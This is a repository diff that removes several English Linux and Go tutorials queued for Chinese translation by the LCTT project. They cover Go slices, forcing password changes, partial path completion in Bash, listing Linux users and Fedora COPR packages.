>>> a = [1,2,3,4,5]
|
||||||
|
>>> b = a
|
||||||
|
>>> b[2] = 0
|
||||||
|
>>> a
|
||||||
|
[1, 2, 0, 4, 5]
|
||||||
|
```
|
||||||
|
|
||||||
|
And also in Ruby:
|
||||||
|
|
||||||
|
```
|
||||||
|
irb(main):001:0> a = [1,2,3,4,5]
|
||||||
|
=> [1, 2, 3, 4, 5]
|
||||||
|
irb(main):002:0> b = a
|
||||||
|
=> [1, 2, 3, 4, 5]
|
||||||
|
irb(main):003:0> b[2] = 0
|
||||||
|
=> 0
|
||||||
|
irb(main):004:0> a
|
||||||
|
=> [1, 2, 0, 4, 5]
|
||||||
|
```
|
||||||
|
|
||||||
|
The same applies to most languages that treat arrays as objects or reference types.[4][8]
|
||||||
|
|
||||||
|
### The slice header value
|
||||||
|
|
||||||
|
The magic that makes a slice behave as both a value and a pointer comes from understanding that a slice is actually a struct type. This is commonly referred to as a _slice header_ after its [counterpart in the reflect package][20]. The definition of a slice header looks something like this:
|
||||||
|
|
||||||
|
![](https://dave.cheney.net/wp-content/uploads/2018/07/slice.001-300x257.png)
|
||||||
|
|
||||||
|
```
|
||||||
|
package runtime
|
||||||
|
|
||||||
|
type slice struct {
|
||||||
|
ptr unsafe.Pointer
|
||||||
|
len int
|
||||||
|
cap int
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
This is important because, [_unlike_ `map` and `chan` types][21], slices are value types and are _copied_ when assigned or passed as arguments to functions.
|
||||||
|
|
||||||
|
To illustrate this, programmers instinctively understand that `square`‘s formal parameter `v` is an independent copy of the `v` declared in `main`.
|
||||||
|
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func square(v int) {
|
||||||
|
v = v * v
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
v := 3
|
||||||
|
square(v)
|
||||||
|
fmt.Println(v) // prints 3, not 9
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
So the operation of `square` on its `v` has no effect on `main`‘s `v`. So too the formal parameter `s` of `double` is an independent copy of the slice `s` declared in `main`, _not_ a pointer to `main`‘s `s` value.
|
||||||
|
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func double(s []int) {
|
||||||
|
s = append(s, s...)
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
s := []int{1, 2, 3}
|
||||||
|
double(s)
|
||||||
|
fmt.Println(s, len(s)) // prints [1 2 3] 3
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
The slightly unusual nature of a Go slice variable is that it's passed around as a value, not a pointer. 90% of the time when you declare a struct in Go, you will pass around a pointer to values of that struct.[5][9] This is quite uncommon; the only other example of passing a struct around as a value I can think of offhand is `time.Time`.
|
||||||
|
|
||||||
|
It is this exceptional behaviour of slices as values, rather than pointers to values, that can confuse a Go programmer's understanding of how slices work. Just remember that any time you assign, subslice, pass, or return a slice, you're making a copy of the three fields in the slice header: the pointer to the underlying array, and the current length and capacity.
|
||||||
|
|
||||||
|
### Putting it all together
|
||||||
|
|
||||||
|
I’m going to conclude this post on the example of a slice as a stack that I opened this post with:
|
||||||
|
|
||||||
|
```
|
||||||
|
package main
|
||||||
|
|
||||||
|
import "fmt"
|
||||||
|
|
||||||
|
func f(s []string, level int) {
|
||||||
|
if level > 5 {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
s = append(s, fmt.Sprint(level))
|
||||||
|
f(s, level+1)
|
||||||
|
fmt.Println("level:", level, "slice:", s)
|
||||||
|
}
|
||||||
|
|
||||||
|
func main() {
|
||||||
|
f(nil, 0)
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Starting from `main` we pass a `nil` slice into `f` as `level` 0. Inside `f` we append the current `level` to `s` before incrementing `level` and recursing. Once `level` exceeds 5, the calls to `f` return, printing their current level and the contents of their copy of `s`.
|
||||||
|
|
||||||
|
```
|
||||||
|
level: 5 slice: [0 1 2 3 4 5]
|
||||||
|
level: 4 slice: [0 1 2 3 4]
|
||||||
|
level: 3 slice: [0 1 2 3]
|
||||||
|
level: 2 slice: [0 1 2]
|
||||||
|
level: 1 slice: [0 1]
|
||||||
|
level: 0 slice: [0]
|
||||||
|
```
|
||||||
|
|
||||||
|
You can see that at each level the value of `s` was unaffected by the operation of other callers of `f`, and that while four underlying arrays were created,[6][10] higher levels of `f` in the call stack are unaffected by the copy and reallocation of new underlying arrays as a by-product of `append`.
|
||||||
|
|
||||||
|
### Further reading
|
||||||
|
|
||||||
|
If you want to find out more about how slices work in Go, I recommend these posts from the Go blog:
|
||||||
|
|
||||||
|
* [Go Slices: usage and internals][11] (blog.golang.org)
|
||||||
|
|
||||||
|
* [Arrays, slices (and strings): The mechanics of ‘append’][12] (blog.golang.org)
|
||||||
|
|
||||||
|
### Notes
|
||||||
|
|
||||||
|
1. This is not a unique property of arrays. In Go _every_ assignment is a copy.[][13]
|
||||||
|
|
||||||
|
2. You can also use `len` on array values, but the result is a foregone conclusion.[][14]
|
||||||
|
|
||||||
|
3. This is also known as the backing array or sometimes, less correctly, as the backing slice[][15]
|
||||||
|
|
||||||
|
4. In Go we tend to say value type and pointer type because of the confusion caused by C++'s _reference_ type, but in this case I think calling arrays-as-objects reference types is appropriate.[][16]
|
||||||
|
|
||||||
|
5. I’d argue if that struct has a [method defined on it and/or is used to satisfy an interface][17]then the percentage that you will pass around a pointer to your struct raises to near 100%.[][18]
|
||||||
|
|
||||||
|
6. Proof of this is left as an exercise to the reader.[][19]
|
||||||
|
|
||||||
|
### Related Posts:
|
||||||
|
|
||||||
|
1. [If a map isn’t a reference variable, what is it?][4]
|
||||||
|
|
||||||
|
2. [What is the zero value, and why is it useful ?][5]
|
||||||
|
|
||||||
|
3. [The empty struct][6]
|
||||||
|
|
||||||
|
4. [Should methods be declared on T or *T][7]
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://dave.cheney.net/2018/07/12/slices-from-the-ground-up
|
||||||
|
|
||||||
|
作者:[Dave Cheney][a]
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://dave.cheney.net/
|
||||||
|
[1]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-1-3265
|
||||||
|
[2]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-2-3265
|
||||||
|
[3]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-3-3265
|
||||||
|
[4]:https://dave.cheney.net/2017/04/30/if-a-map-isnt-a-reference-variable-what-is-it
|
||||||
|
[5]:https://dave.cheney.net/2013/01/19/what-is-the-zero-value-and-why-is-it-useful
|
||||||
|
[6]:https://dave.cheney.net/2014/03/25/the-empty-struct
|
||||||
|
[7]:https://dave.cheney.net/2016/03/19/should-methods-be-declared-on-t-or-t
|
||||||
|
[8]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-4-3265
|
||||||
|
[9]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-5-3265
|
||||||
|
[10]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-bottom-6-3265
|
||||||
|
[11]:https://blog.golang.org/go-slices-usage-and-internals
|
||||||
|
[12]:https://blog.golang.org/slices
|
||||||
|
[13]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-1-3265
|
||||||
|
[14]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-2-3265
|
||||||
|
[15]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-3-3265
|
||||||
|
[16]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-4-3265
|
||||||
|
[17]:https://dave.cheney.net/2016/03/19/should-methods-be-declared-on-t-or-t
|
||||||
|
[18]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-5-3265
|
||||||
|
[19]:https://dave.cheney.net/2018/07/12/slices-from-the-ground-up#easy-footnote-6-3265
|
||||||
|
[20]:https://golang.org/pkg/reflect/#SliceHeader
|
||||||
|
[21]:https://dave.cheney.net/2017/04/30/if-a-map-isnt-a-reference-variable-what-is-it
|
@ -1,162 +0,0 @@
|
|||||||
Translating by MjSeven
|
|
||||||
|
|
||||||
|
|
||||||
How To Force User To Change Password On Next Login In Linux
|
|
||||||
======
|
|
||||||
When you create a user account with a default password, you should force the user to change that password at their next login.
|
|
||||||
|
|
||||||
This practice is essential when you work in an organization, because former employees may still know the default password and could misuse it.
|
|
||||||
|
|
||||||
This is a common security concern, so make sure it is handled properly and consistently; your team members should follow the same practice.
|
|
||||||
|
|
||||||
Most users are lazy and won't change their password until you force them to, so make this a standard practice.
|
|
||||||
|
|
||||||
For security reasons, you should change your password frequently, or at least once a month.
|
|
||||||
|
|
||||||
Make sure you use a hard-to-guess password (a combination of uppercase and lowercase letters, numbers, and special characters) of at least 10-15 characters.
|
|
||||||
|
|
||||||
We ran a shell script to create user accounts on a Linux server; it automatically assigns each user a password made up of the actual username followed by a few numeric values.
|
|
||||||
|
|
||||||
We can achieve this using either of the two methods below.
|
|
||||||
|
|
||||||
* passwd command
|
|
||||||
* chage command
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
**Suggested Read :**
|
|
||||||
**(#)** [How To Check Which Groups A User Belongs To On Linux][1]
|
|
||||||
**(#)** [How To Check User Created Date On Linux][2]
|
|
||||||
**(#)** [How To Reset/Change User Password In Linux][3]
|
|
||||||
**(#)** [How To Manage Password Expiration & Aging Using passwd Command][4]
|
|
||||||
|
|
||||||
### Method-1: Using passwd Command
|
|
||||||
|
|
||||||
passwd stands for password. It updates a user's authentication tokens, and is used to set, modify, or change a user's password.
|
|
||||||
|
|
||||||
Normal users can only change the password for their own account, but the superuser can change the password for any account.
|
|
||||||
|
|
||||||
Additional options allow other operations as well, such as deleting a user's password, locking or unlocking a user account, and setting the password expiry for a given account.
|
|
||||||
|
|
||||||
On Linux, this is performed by calling the Linux-PAM and libuser APIs.
|
|
||||||
|
|
||||||
When you create a user in Linux, the user's details are stored in the /etc/passwd file. The passwd file holds each user's details as a single line with seven colon-separated fields.
|
|
||||||
|
|
||||||
The following four files are also updated when a new user is created on a Linux system.
|
|
||||||
|
|
||||||
* `/etc/passwd:` User details will be updated in this file.
|
|
||||||
* `/etc/shadow:` User password info will be updated in this file.
|
|
||||||
* `/etc/group:` The new user's group details will be updated in this file.
|
|
||||||
* `/etc/gshadow:` The new user's group password info will be updated in this file.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#### How To Perform This With passwd Command
|
|
||||||
|
|
||||||
We can perform this with the passwd command by adding the `-e` option.
|
|
||||||
|
|
||||||
To test this, let's create a new user account and see how it works.
|
|
||||||
```
# useradd -c "2g Admin - Magesh M" magesh && passwd magesh
Changing password for user magesh.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
```

Expire the password for the given user account. The user will be forced to change the password during the next login attempt.

```
# passwd -e magesh
Expiring password for user magesh.
passwd: Success
```

It asks me to set a new password when I try to log in to the system for the first time.

```
login as: magesh
[email protected]'s password:
You are required to change your password immediately (root enforced)
WARNING: Your password has expired.
You must change your password now and login again!
Changing password for user magesh.
Changing password for magesh.
(current) UNIX password:
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
Connection to localhost closed.
```
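Under the hood, `passwd -e` works by clearing the “date of last password change” field (the third colon-separated field) of the user’s /etc/shadow entry. As a minimal sketch, using hypothetical shadow lines with shortened hashes rather than a real /etc/shadow file, that field can be inspected with plain shell:

```shell
# Detect whether an /etc/shadow-style entry forces a password change at
# next login: both `passwd -e` and `chage -d 0` set the third field
# (days since the epoch of the last password change) to 0.
is_forced_change() {
    last_change=$(printf '%s' "$1" | cut -d: -f3)
    [ "$last_change" = "0" ]
}

# Hypothetical shadow entries (hashes shortened for illustration):
forced='magesh:$6$abc:0:0:99999:7:::'
normal='thanu:$6$xyz:17730:0:99999:7:::'

is_forced_change "$forced" && echo "magesh must change password at next login"
is_forced_change "$normal" || echo "thanu logs in normally"
```

Note that reading the real /etc/shadow requires root privileges, which is why both commands above are run from the root account.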
### Method-2: Using chage Command

chage stands for “change age”. It changes user password expiry information.

The chage command changes the number of days between password changes and the date of the last password change. This information is used by the system to determine when a user must change his/her password.

It also allows the user to perform other activities such as setting the account expiration date, setting the password inactive after expiration, showing account aging information, setting the minimum & maximum number of days before password change, and setting the expiration warning days.

#### How To Perform This With chage Command

Let’s perform this with the help of the chage command by adding the `-d` option.

To test this, let’s create a new user account and see how it works. We are going to create a user account called `thanu`.
```
# useradd -c "2g Editor - Thanisha M" thanu && passwd thanu
Changing password for user thanu.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
```

To achieve this, set the user’s date of last password change to “0” with the chage command.

```
# chage -d 0 thanu

# chage -l thanu
Last password change                                    : Jul 18, 2018
Password expires                                        : never
Password inactive                                       : never
Account expires                                         : never
Minimum number of days between password change          : 0
Maximum number of days between password change          : 99999
Number of days of warning before password expires       : 7
```

It asks me to set a new password when I try to log in to the system for the first time.

```
login as: thanu
[email protected]'s password:
You are required to change your password immediately (root enforced)
WARNING: Your password has expired.
You must change your password now and login again!
Changing password for user thanu.
Changing password for thanu.
(current) UNIX password:
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
Connection to localhost closed.
```
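For reference, the date printed by `chage -l` is derived from the same shadow field discussed above, which stores the number of days since 1970-01-01. A small sketch (assuming GNU date from coreutils) converts the raw field value back into the human-readable form:

```shell
# Convert the shadow "last change" field (days since 1970-01-01) into
# the date format printed by `chage -l`. Requires GNU date.
last_change_date() {
    date -u -d "1970-01-01 + $1 days" "+%b %d, %Y"
}

last_change_date 17730   # prints "Jul 18, 2018"
last_change_date 0       # prints "Jan 01, 1970" (chage reports this as a forced change)
```

The value 17730 corresponds to the “Jul 18, 2018” shown in the chage output above.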
--------------------------------------------------------------------------------

via: https://www.2daygeek.com/how-to-force-user-to-change-password-on-next-login-in-linux/

作者:[Prakash Subramanian][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.2daygeek.com/author/prakash/
[1]:https://www.2daygeek.com/how-to-check-which-groups-a-user-belongs-to-on-linux/
[2]:https://www.2daygeek.com/how-to-check-user-created-date-on-linux/
[3]:https://www.2daygeek.com/passwd-command-examples/
[4]:https://www.2daygeek.com/passwd-command-examples-part-l/
translating---geekpi

Incomplete Path Expansion (Completion) For Bash
======
![](https://4.bp.blogspot.com/-k2pRIKTzcBU/W1BpFtzzWuI/AAAAAAAABOE/pqX4XcOX8T4NWkKOmzD0T0OioqxzCmhLgCLcBGAs/s1600/Gnu-bash-logo.png)

[bash-complete-partial-path][1] enhances the path completion in Bash (on Linux, macOS with gnu-sed, and Windows with MSYS) by adding incomplete path expansion, similar to Zsh. This is useful if you want this time-saving feature in Bash, without having to switch to Zsh.

Here is how this works. When the `Tab` key is pressed, bash-complete-partial-path assumes each component is incomplete and tries to expand it. Let's say you want to navigate to `/usr/share/applications`. You can type `cd /u/s/app`, press `Tab`, and bash-complete-partial-path should expand it into `cd /usr/share/applications`. If there are conflicts, only the path without conflicts is completed upon pressing `Tab`. For instance, Ubuntu users should have quite a few folders in `/usr/share` that begin with "app", so in this case, typing `cd /u/s/app` will only expand the `/usr/share/` part.

Here is another example of deeper incomplete file path expansion. On an Ubuntu system, type `cd /u/s/f/t/u`, press `Tab`, and it should be automatically expanded to `cd /usr/share/fonts/truetype/ubuntu`.
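The plugin's real implementation hooks into Bash's completion machinery, but the core idea can be sketched in a few lines of portable shell: treat each component of the partial path as a prefix, expand it with a glob, and keep the expansion only when it is unambiguous. Everything below (the function name and the demo directory tree) is illustrative, not the plugin's actual code:

```shell
# Toy version of incomplete path expansion: expand each component of
# the partial path via globbing when the match is unique; ambiguous or
# missing components are left exactly as typed.
expand_partial_path() (
    # run in a subshell so IFS and positional parameters stay contained
    input=$1
    case $input in /*) result="" ;; *) result="." ;; esac
    IFS='/'
    for part in $input; do
        [ -z "$part" ] && continue
        set -- "$result/$part"*/                 # glob candidate directories
        if [ "$#" -eq 1 ] && [ -d "$1" ]; then
            result="${1%/}"                      # unique match: expand
        else
            result="$result/$part"               # ambiguous/missing: keep
        fi
    done
    printf '%s\n' "$result"
)

# Demo on a throwaway tree:
demo=$(mktemp -d)
mkdir -p "$demo/usr/share/applications"
cd "$demo"
expand_partial_path "u/s/app"   # prints ./usr/share/applications
```

When a second directory such as `usr/src` exists, the ambiguous `s` component stays as typed, mirroring the conflict behavior described above.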
Features include:

  * Escapes special characters
  * If the user starts the path with quotes, character escaping is not applied and instead, the quote is closed with a matching character after expanding the path
  * Properly expands ~ expressions
  * If the bash-completion package is already in use, this code will safely override its _filedir function. No extra configuration is required, just make sure you source this project after the main bash-completion.

Check out the [project page][2] for more information and a demo screencast.

### Install bash-complete-partial-path

The bash-complete-partial-path installation instructions specify downloading the bash_completion script directly. I prefer to grab the Git repository instead, so I can update it with a simple `git pull`; therefore the instructions below will use this method of installing bash-complete-partial-path. You can use the [official][3] instructions if you prefer them.

1. Install Git (needed to clone the bash-complete-partial-path Git repository).

In Debian, Ubuntu, Linux Mint and so on, use this command to install Git:

```
sudo apt install git
```
2. Clone the bash-complete-partial-path Git repository in `~/.config/`:

```
cd ~/.config && git clone https://github.com/sio/bash-complete-partial-path
```

3. Source `~/.config/bash-complete-partial-path/bash_completion` in your `~/.bashrc` file.

Open ~/.bashrc with a text editor. You can use Gedit for example:

```
gedit ~/.bashrc
```

At the end of the `~/.bashrc` file add the following (as a single line):

```
[ -s "$HOME/.config/bash-complete-partial-path/bash_completion" ] && source "$HOME/.config/bash-complete-partial-path/bash_completion"
```

I mentioned adding it at the end of the file because it needs to be included below (after) the main bash-completion in your `~/.bashrc` file. So make sure you don't add it above the original bash-completion, as that will cause issues.

4. Source `~/.bashrc`:

```
source ~/.bashrc
```

And you're done, bash-complete-partial-path should now be installed and ready to be used.
--------------------------------------------------------------------------------

via: https://www.linuxuprising.com/2018/07/incomplete-path-expansion-completion.html

作者:[Logix][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://plus.google.com/118280394805678839070
[1]:https://github.com/sio/bash-complete-partial-path
[2]:https://github.com/sio/bash-complete-partial-path
[3]:https://github.com/sio/bash-complete-partial-path#installation-and-updating
3 Methods to List All The Users in Linux System
======
Everyone knows that user information resides in the `/etc/passwd` file.

It’s a text file that contains the essential information about each user.

When we create a new user, the new user’s details are appended to this file.

The /etc/passwd file contains each user’s essential information as a single line with seven fields.

Each line in /etc/passwd represents a single user. This file keeps the user information in three parts.

  * `Part-1:` root user information
  * `Part-2:` system-defined accounts information
  * `Part-3:` real user information

**Suggested Read :**
**(#)** [How To Check User Created Date On Linux][1]
**(#)** [How To Check Which Groups A User Belongs To On Linux][2]
**(#)** [How To Force User To Change Password On Next Login In Linux][3]

The first part is the root account, which is the administrator account with complete power over every aspect of the system.

The second part is the system-defined groups and accounts that are required for proper installation and updating of system software.

The third part, at the end, represents the real people who use the system.

While creating a new user, the below four files will be modified.

  * `/etc/passwd:` User details will be updated in this file.
  * `/etc/shadow:` User password info will be updated in this file.
  * `/etc/group:` Group details of the new user will be updated in this file.
  * `/etc/gshadow:` Group password info of the new user will be updated in this file.

### Method-1: Using /etc/passwd file

Use any file manipulation command such as cat, more, less, etc., to print the list of users created on your Linux system.

The `/etc/passwd` file is a text file that contains each user’s information, which is necessary to log in to the Linux system. It maintains useful information about users such as username, password, user ID, group ID, user ID info, home directory, and shell.

The /etc/passwd file contains every user’s details as a single line with seven fields as described below, each field separated by a colon “:”.
```
# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
2gadmin:x:500:10::/home/viadmin:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
zabbix:x:498:499:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
mysql:x:497:502::/home/mysql:/bin/bash
zend:x:502:503::/u01/zend/zend/gui/lighttpd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
2daygeek:x:503:504::/home/2daygeek:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
mageshm:x:506:507:2g Admin - Magesh M:/home/mageshm:/bin/bash
```

Below is detailed information about the seven fields.

  * **`Username (mageshm):`** Username of the created user. Its length should be between 1 and 32 characters.
  * **`Password (x):`** It indicates that the encrypted password is stored in the /etc/shadow file.
  * **`User ID (UID-506):`** It indicates the user ID (UID). Each user should have a unique UID. UID 0 (zero) is reserved for root, UIDs 1-99 are reserved for system users, and UIDs 100-999 are reserved for system accounts/groups.
  * **`Group ID (GID-507):`** It indicates the group ID (GID). Each group should have a unique GID, which is stored in the /etc/group file.
  * **`User ID Info (2g Admin - Magesh M):`** It indicates the comment field. This field can be used to describe the user.
  * **`Home Directory (/home/mageshm):`** It indicates the user’s home directory.
  * **`Shell (/bin/bash):`** It indicates the user’s shell.
You can use the **awk** or **cut** command to print only the list of user names on your Linux system. Both show the same results.

```
# awk -F':' '{ print $1}' /etc/passwd
or
# cut -d: -f1 /etc/passwd
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
ftp
postfix
sshd
tcpdump
2gadmin
apache
zabbix
mysql
zend
rpc
2daygeek
named
mageshm
```
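Following the three-part split described earlier, the same field-based approach can narrow the list down to the “real user” part by filtering on the UID field. The sample file below is hypothetical, and the boundary of 500 matches this article's distribution; on many modern systems regular users start at UID 1000 (see UID_MIN in /etc/login.defs):

```shell
# Print only "real" users: accounts whose UID (field 3) is at or above
# the first regular-user UID. The sample data is hypothetical.
cat > sample_passwd <<'EOF'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
2daygeek:x:503:504::/home/2daygeek:/bin/bash
mageshm:x:506:507:2g Admin - Magesh M:/home/mageshm:/bin/bash
EOF

awk -F: -v min=500 '$3 >= min { print $1 }' sample_passwd
# prints:
# 2daygeek
# mageshm
```

Run the same awk program against the real /etc/passwd to filter your own system's user list.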
### Method-2: Using getent Command

The getent command displays entries from databases supported by the Name Service Switch libraries, which are configured in /etc/nsswitch.conf.

The getent command shows user details similar to the /etc/passwd file; it shows every user’s details as a single line with seven fields.

```
# getent passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
2gadmin:x:500:10::/home/viadmin:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
zabbix:x:498:499:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
mysql:x:497:502::/home/mysql:/bin/bash
zend:x:502:503::/u01/zend/zend/gui/lighttpd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
2daygeek:x:503:504::/home/2daygeek:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
mageshm:x:506:507:2g Admin - Magesh M:/home/mageshm:/bin/bash
```

The seven fields are the same as described in Method-1 above.
Here too, you can use the **awk** or **cut** command to print only the list of user names. Both show the same results.

```
# getent passwd | awk -F':' '{ print $1}'
or
# getent passwd | cut -d: -f1
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
ftp
postfix
sshd
tcpdump
2gadmin
apache
zabbix
mysql
zend
rpc
2daygeek
named
mageshm
```
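Beyond dumping the whole database, getent can also query a single entry by name or by UID, which makes it convenient for existence checks in scripts:

```shell
# Look up one account by name or by UID; getent exits non-zero when the
# key is not found, so it works directly in conditionals.
if getent passwd root > /dev/null; then
    echo "root exists"
fi

getent passwd 0 | cut -d: -f1   # prints root
```

Because getent goes through the Name Service Switch, this also finds accounts served by LDAP or NIS that never appear in the local /etc/passwd file.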
### Method-3: Using compgen Command

compgen is a bash built-in command that shows all available commands, aliases, and functions. With the `-u` option, it generates the list of user accounts.

```
# compgen -u
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
ftp
postfix
sshd
tcpdump
2gadmin
apache
zabbix
mysql
zend
rpc
2daygeek
named
mageshm
```
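Since compgen prints one name per line, its output pipes cleanly into the usual text tools; and since it is a bash builtin, invoke it through bash when scripting from other shells. For example, to filter the list for a single account:

```shell
# Filter the compgen user list for an exact name; grep -x matches the
# whole line, so partial names like "roots" are not reported.
bash -c 'compgen -u' | grep -x 'root'
```

The command prints `root` (and exits zero) when the account exists, which makes it usable in conditionals just like the getent check above.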
Please share your input in our comments section so that we can improve our blog and make more effective articles. So, stay tuned with us.
--------------------------------------------------------------------------------

via: https://www.2daygeek.com/3-methods-to-list-all-the-users-in-linux-system/

作者:[Magesh Maruthamuthu][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.2daygeek.com/author/magesh/
[1]:https://www.2daygeek.com/how-to-check-user-created-date-on-linux/
[2]:https://www.2daygeek.com/how-to-check-which-groups-a-user-belongs-to-on-linux/
[3]:https://www.2daygeek.com/how-to-force-user-to-change-password-on-next-login-in-linux/
4 cool new projects to try in COPR for July 2018
======
![](https://fedoramagazine.org/wp-content/uploads/2017/08/4-copr-945x400.jpg)

COPR is a [collection][1] of personal repositories for software that isn’t carried in Fedora. Some software doesn’t conform to standards that allow easy packaging. Or it may not meet other Fedora standards, despite being free and open source. COPR can offer these projects outside the Fedora set of packages. Software in COPR isn’t supported by Fedora infrastructure or signed by the project. However, it can be a neat way to try new or experimental software.

Here’s a set of new and interesting projects in COPR.

### Hledger

[Hledger][2] is a command-line program for tracking money or other commodities. It uses a simple, plain-text formatted journal for storing data and double-entry accounting. In addition to the command-line interface, hledger offers a terminal interface and a web client that can show graphs of balance on the accounts.

![][3]

#### Installation instructions

The repo currently provides hledger for Fedora 27, 28, and Rawhide. To install hledger, use these commands:

```
sudo dnf copr enable kefah/HLedger
sudo dnf install hledger
```

### Neofetch

[Neofetch][4] is a command-line tool that displays information about the operating system, software, and hardware. Its main purpose is to show the data in a compact way to take screenshots. You can configure Neofetch to display exactly the way you want, by using both command-line flags and a configuration file.

![][5]

#### Installation instructions

The repo currently provides Neofetch for Fedora 28. To install Neofetch, use these commands:

```
sudo dnf copr enable sysek/neofetch
sudo dnf install neofetch
```

### Remarkable

[Remarkable][6] is a Markdown text editor that uses the GitHub-like flavor of Markdown. It offers a preview of the document, as well as the option to export to PDF and HTML. There are several styles available for the Markdown, including an option to create your own styles using CSS. In addition, Remarkable supports LaTeX syntax for writing equations and syntax highlighting for source code.

![][7]

#### Installation instructions

The repo currently provides Remarkable for Fedora 28 and Rawhide. To install Remarkable, use these commands:

```
sudo dnf copr enable neteler/remarkable
sudo dnf install remarkable
```

### Aha

[Aha][8] (or ANSI HTML Adapter) is a command-line tool that converts terminal escape sequences to HTML code. This allows you to share, for example, the output of git diff or htop as a static HTML page.

![][9]

#### Installation instructions

The [repo][10] currently provides aha for Fedora 26, 27, 28, and Rawhide, EPEL 6 and 7, and other distributions. To install aha, use these commands:

```
sudo dnf copr enable scx/aha
sudo dnf install aha
```
--------------------------------------------------------------------------------

via: https://fedoramagazine.org/4-try-copr-july-2018/

作者:[Dominik Turecek][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://fedoramagazine.org
[1]:https://copr.fedorainfracloud.org/
[2]:http://hledger.org/
[3]:https://fedoramagazine.org/wp-content/uploads/2018/07/hledger.png
